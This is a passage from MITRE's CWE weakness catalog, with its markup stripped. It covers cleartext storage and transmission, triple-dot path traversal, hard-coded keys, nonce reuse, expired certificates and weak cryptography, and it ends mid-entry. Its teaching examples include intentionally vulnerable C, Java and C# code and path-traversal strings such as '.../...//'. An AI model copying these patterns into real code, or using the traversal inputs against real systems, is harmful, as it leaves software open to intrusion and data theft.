Storage in GUI - - - - The application stores sensitive information in cleartext in an executable. - Attackers can reverse engineer binary code to obtain secret data. This is especially easy when the cleartext is plain ASCII. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - CVE-2005-1794 - Product stores RSA private key in a DLL and uses it to sign a certificate, allowing spoofing of servers and Adversary-in-the-Middle (AITM) attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1794 - - - CVE-2001-1527 - administration passwords in cleartext in executable - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1527 - - - - - Plaintext Storage in Executable - - - - - - - - Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Description, Name, Potential_Mitigations, Terminology_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - Plaintext Storage in Executable - - - - The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. - Many communication channels can be "sniffed" by attackers during data transmission. For example, network traffic can often be sniffed by any attacker who has access to a network interface. This significantly lowers the difficulty of exploitation by attackers. - - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Operation - - - System Configuration - - - High - - - Integrity - Confidentiality - Read Application Data - Modify Files or Directories - Anyone can read the information by gaining access to the channel being used for communication. - - - - - Black Box - - Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. - Attach the monitor to the process, trigger the feature that sends the data, and look for the presence or absence of common cryptographic functions in the call tree. Monitor the network and determine if the data packets contain readable commands. Tools exist for detecting if certain encodings are in use. If the traffic contains high entropy, this might indicate the usage of encryption. - - - - - - Architecture and Design - Encrypt the data with a reliable encryption scheme before transmitting. - - - Implementation - When using web applications with SSL, use SSL for the entire session from login to logout, not just for the initial login page. - - - Testing - Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Operation - Configure servers to use encrypted channels for communication, which may include SSL or other secure protocols. - - - - - The following code attempts to establish a connection to a site to communicate sensitive information. - - try {URL u = new URL("http://www.secret.example.org/");HttpURLConnection hu = (HttpURLConnection) u.openConnection();hu.setRequestMethod("PUT");hu.connect();OutputStream os = hu.getOutputStream();hu.disconnect();}catch (IOException e) { - - - //... - - - } - - Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors. - - - - - CVE-2002-1949 - Passwords transmitted in cleartext. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1949 - - - CVE-2008-4122 - Chain: Use of HTTPS cookie without "secure" flag causes it to be transmitted across unencrypted HTTP. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4122 - - - CVE-2008-3289 - Product sends password hash in cleartext in violation of intended policy. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3289 - - - CVE-2008-4390 - Remote management feature sends sensitive information including passwords in cleartext. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4390 - - - CVE-2007-5626 - Backup routine sends password in cleartext in email. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626 - - - CVE-2004-1852 - Product transmits Blowfish encryption key in cleartext. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1852 - - - CVE-2008-0374 - Printer sends configuration information, including administrative password, in cleartext. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0374 - - - CVE-2007-4961 - Chain: cleartext transmission of the MD5 hash of password enables attacks against a server that is susceptible to replay (CWE-294). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961 - - - CVE-2007-4786 - Product sends passwords in cleartext to a log server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4786 - - - CVE-2005-3140 - Product sends file with cleartext passwords in e-mail message intended for diagnostic purposes. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3140 - - - - - Plaintext Transmission of Sensitive Information - - - SEC06-J - Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar - - - SER02-J - Sign then seal sensitive objects before sending them outside a trust boundary - - - SFP23 - Exposed Data - - - - - - - - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2010-04-05 - updated Applicable_Platforms, Common_Consequences, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-06-21 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Observed_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, References - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-01-23 - updated Abstraction - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships, Type - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Related_Attack_Patterns, Relationships - - Plaintext Transmission of Sensitive Information - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '...' (triple dot) sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - The '...' manipulation is useful for bypassing some path traversal protection schemes. On some Windows systems, it is equivalent to "..\.." and might bypass checks that assume only two dots are valid. Incomplete filtering, such as removal of "./" sequences, can ultimately produce valid ".." sequences due to a collapse into unsafe value (CWE-182). - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2001-0467 - "\..." in web server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0467 - - - CVE-2001-0615 - "..." or "...." in chat server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615 - - - CVE-2001-0963 - "..." in cd command in FTP server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0963 - - - CVE-2001-1193 - "..." in cd command in FTP server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1193 - - - CVE-2001-1131 - "..." in cd command in FTP server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1131 - - - CVE-2001-0480 - read of arbitrary files and directories using GET or CD with "..." in Windows-based FTP server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0480 - - - CVE-2002-0288 - read files using "." and Unicode-encoded "/" or "\" characters in the URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0288 - - - CVE-2003-0313 - Directory listing of web server using "..." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0313 - - - CVE-2005-1658 - Triple dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1658 - - - - - '...' (triple dot) - - - SFP16 - Path Traversal - - - - - This manipulation-focused entry is currently hiding two distinct weaknesses, so it might need to be split. The manipulation is effective in two different contexts: - - - it is equivalent to "..\.." on Windows, or - it can take advantage of incomplete filtering, e.g. if the programmer does a single-pass removal of "./" in a string (collapse of data into unsafe value, CWE-182). - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Maintenance_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Maintenance_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Maintenance_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - Path Issue - Triple Dot - '...' - - - - The use of a hard-coded cryptographic key significantly increases the possibility that encrypted data may be recovered. - - - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - If hard-coded cryptographic keys are used, it is almost certain that malicious users will gain access through the account in question. - - - - - Architecture and Design - Prevention schemes mirror that of hard-coded password storage. - - - - - The following code examples attempt to verify a password using a hard-coded cryptographic key. - - int VerifyAdmin(char *password) { - if (strcmp(password,"68af404b513073584c4b6f22b6c63e6b")) { - - printf("Incorrect Password!\n");return(0); - }printf("Entering Diagnostic Mode...\n");return(1); - } - - - public boolean VerifyAdmin(String password) {if (password.equals("68af404b513073584c4b6f22b6c63e6b")) {System.out.println("Entering Diagnostic Mode...");return true;}System.out.println("Incorrect Password!");return false; - - - - int VerifyAdmin(String password) {if (password.Equals("68af404b513073584c4b6f22b6c63e6b")) {Console.WriteLine("Entering Diagnostic Mode...");return(1);}Console.WriteLine("Incorrect Password!");return(0);} - - The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system. - - - - - Use of hard-coded cryptographic key - - - A8 - Insecure Cryptographic Storage - CWE More Specific - - - A9 - Insecure Communications - CWE More Specific - - - A8 - Insecure Storage - CWE More Specific - - - SFP33 - Hardcoded sensitive data - - - - - - - The main difference between the use of hard-coded passwords and the use of hard-coded cryptographic keys is the false sense of security that the former conveys. Many people believe that simply hashing a hard-coded password before storage will protect the information from malicious users. However, many hashes are reversible (or at least vulnerable to brute force attacks) -- and further, many authentication protocols simply request the hash itself, making it no better than a password. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software performs a key exchange with an actor without verifying the identity of that actor. - Performing a key exchange will preserve the integrity of the information sent between two entities, but this will not guarantee that the entities are who they claim they are. This may enable an attacker to impersonate an actor by modifying traffic between the two entities. Typically, this involves a victim client that contacts a malicious server that is impersonating a trusted server. If the client skips authentication or ignores an authentication failure, the malicious server may request authentication information from the user. The malicious server can then use this authentication information to log in to the trusted server using the victim's credentials, sniff traffic between the victim and trusted server, etc. - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - High - - - Access Control - Bypass Protection Mechanism - No authentication takes place in this process, bypassing an assumed protection of encryption. - - - Confidentiality - Read Application Data - The encrypted communication between a user and a trusted host may be subject to sniffing by any actor in the communication path. - - - - - Architecture and Design - Ensure that proper authentication is included in the system design. - - - Implementation - Understand and properly implement all checks necessary to ensure the identity of entities involved in encrypted communications. - - - - - Many systems have used Diffie-Hellman key exchange without authenticating the entities exchanging keys, allowing attackers to influence communications by redirecting or interfering with the communication path. Many people using SSL/TLS skip the authentication (often unknowingly). - - - - - Key exchange without entity authentication - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-10 - clarified the description - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Common_Consequences, Demonstrative_Examples, Description, References, Relationships - - - - - Nonces should be used for the present occasion and only once. - - - - - - - - Nonces are often bundled with a key in a communication exchange to produce a new session key for each exchange. - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - Potentially a replay attack, in which an attacker could send the same data twice, could be crafted if nonces are allowed to be reused. This could allow a user to send a message which masquerades as a valid message from a valid user. - - - - - Implementation - Refuse to reuse nonce values. - - - Implementation - Use techniques such as requiring incrementing, time based and/or challenge response to assure uniqueness of nonces. - - - - - This code takes a password, concatenates it with a nonce, then encrypts it before sending over a network: - - void encryptAndSendPassword(char *password){char *nonce = "bad";...char *data = (unsigned char*)malloc(20);int para_size = strlen(nonce) + strlen(password);char *paragraph = (char*)malloc(para_size);SHA1((const unsigned char*)paragraph,parsize,(unsigned char*)data);sendEncryptedData(data)} - - Because the nonce used is always the same, an attacker can impersonate a trusted party by intercepting and resending the encrypted password. This attack avoids the need to learn the unencrypted password. - - - This code sends a command to a remote server, using an encrypted password and nonce to prove the command is from a trusted party: - - String command = new String("some command to execute");MessageDigest nonce = MessageDigest.getInstance("SHA");nonce.update(String.valueOf("bad nonce"));byte[] nonce = nonce.digest();MessageDigest password = MessageDigest.getInstance("SHA");password.update(nonce + "secretPassword");byte[] digest = password.digest();sendCommand(digest, command) - - Once again the nonce used is always the same. An attacker may be able to replay previous legitimate commands or execute new arbitrary commands. - - - - - Reusing a nonce, key pair in encryption - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Background_Details, Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key. - While the expiration of keys does not necessarily ensure that they are compromised, it is a significant concern that keys which remain in use for prolonged periods of time have a decreasing probability of integrity. For this reason, it is important to replace keys within a period of time proportional to their strength. - - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Low - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - The cryptographic key in question may be compromised, providing a malicious user with a method for authenticating as the victim. - - - - - Architecture and Design - Adequate consideration should be put in to the user interface in order to notify users previous to the key's expiration, to explain the importance of new key generation and to walk users through the process as painlessly as possible. - - - - - The following code attempts to verify that a certificate is valid. - - if (cert = SSL_get_peer_certificate(ssl)) { - foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERRCERT_NOT_YET_VALID==foo)) - - - //do stuff - - - - - } - - The code checks if the certificate is not yet valid, but it fails to check if a certificate is past its expiration date, thus treating expired certificates as valid. - - - - - Using a key past its expiration date - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References - - Using a Key Past its Expiration Date - - - - The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm. - - - - - - - - - - - Implementation - Developers sometimes omit "expensive" (resource-intensive) steps in order to improve performance, especially in devices with limited memory or slower CPUs. This step may be taken under a mistaken impression that the step is unnecessary for the cryptographic algorithm. - - - - Architecture and Design - - - Requirements - This issue may happen when the requirements for the cryptographic algorithm are not clearly stated. - - - - - - Access Control - Bypass Protection Mechanism - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - Accountability - Non-Repudiation - Hide Activities - - - - - CVE-2001-1585 - Missing challenge-response step allows authentication bypass using public key. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1585 - - - - Cryptography - - - - Missing Required Cryptographic Step - - - A8 - Insecure Cryptographic Storage - CWE More Specific - - - A9 - Insecure Communications - CWE More Specific - - - - - - - Overlaps incomplete/missing security check. - Can be resultant. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Functional_Areas, Modes_of_Introduction, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Common_Consequences, Description, Modes_of_Introduction, Name - - Missing Required Cryptographic Step - - - - The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. - A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources. - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - - - Access Control - Confidentiality - Bypass Protection Mechanism - Read Application Data - An attacker may be able to decrypt the data using brute force attacks. - - - - - Architecture and Design - Use an encryption scheme that is currently considered to be strong by experts in the field. - - - - - CVE-2001-1546 - Weak encryption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1546 - - - CVE-2004-2172 - Weak encryption (chosen plaintext attack) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2172 - - - CVE-2002-1682 - Weak encryption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1682 - - - CVE-2002-1697 - Weak encryption produces same ciphertext from the same plaintext blocks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1697 - - - CVE-2002-1739 - Weak encryption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1739 - - - CVE-2005-2281 - Weak encryption scheme - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2281 - - - CVE-2002-1872 - Weak encryption (XOR) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1872 - - - CVE-2002-1910 - Weak encryption (reversible algorithm). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1910 - - - CVE-2002-1946 - Weak encryption (one-to-one mapping). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1946 - - - CVE-2002-1975 - Encryption error uses fixed salt, simplifying brute force / dictionary attacks (overlaps randomness). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1975 - - - - - Weak Encryption - - - A8 - Insecure Cryptographic Storage - CWE More Specific - - - A9 - Insecure Communications - CWE More Specific - - - A8 - Insecure Storage - CWE More Specific - - - - - - - - - - - - - - PLOVER - 2006-07-19 - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-08 - Critical - Clarified entry to focus on algorithms that do not have major weaknesses, but may not be strong enough for some purposes. - - - CWE Content Team - MITRE - 2009-07-27 - updated Common_Consequences, Description, Maintenance_Notes, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2010-06-21 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Maintenance_Notes, Potential_Mitigations, Relationships - - Weak Encryption - - - - The use of a broken or risky cryptographic algorithm is an unnecessary risk that may result in the exposure of sensitive information. - The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Well-known techniques may exist to break the algorithm. - - - - - - - - - - - Cryptographic algorithms are the methods by which data is scrambled. There are a small number of well-understood and heavily studied algorithms that should be used by most applications. It is quite difficult to produce a secure algorithm, and even high profile algorithms by accomplished cryptographic experts have been broken. - Since the state of cryptography advances so rapidly, it is common for an algorithm to be considered "unsafe" even if it was once thought to be strong. This can happen when new attacks against the algorithm are discovered, or if computing power increases so much that the cryptographic algorithm no longer provides the amount of protection that was originally thought. - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - High - - - Confidentiality - Read Application Data - The confidentiality of sensitive data may be compromised by the use of a broken or risky cryptographic algorithm. - - - Integrity - Modify Application Data - The integrity of sensitive data may be compromised by the use of a broken or risky cryptographic algorithm. - - - Accountability - Non-Repudiation - Hide Activities - If the cryptographic algorithm is used to ensure the identity of the source of the data (such as digital signatures), then a broken algorithm will compromise this scheme and the source of the data cannot be proven. - - - - - Automated Analysis - Automated methods may be useful for recognizing commonly-used libraries or features that have become obsolete. - Moderate - False negatives may occur if the tool is not aware of the cryptographic libraries in use, or if custom cryptography is being used. - - - Manual Analysis - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - Binary / Bytecode simple extractor - strings, ELF readers, etc. - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Man-in-the-middle attack tool - - - Cost effective for partial coverage: - - - Framework-based Fuzzer - Automated Monitored Execution - Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source 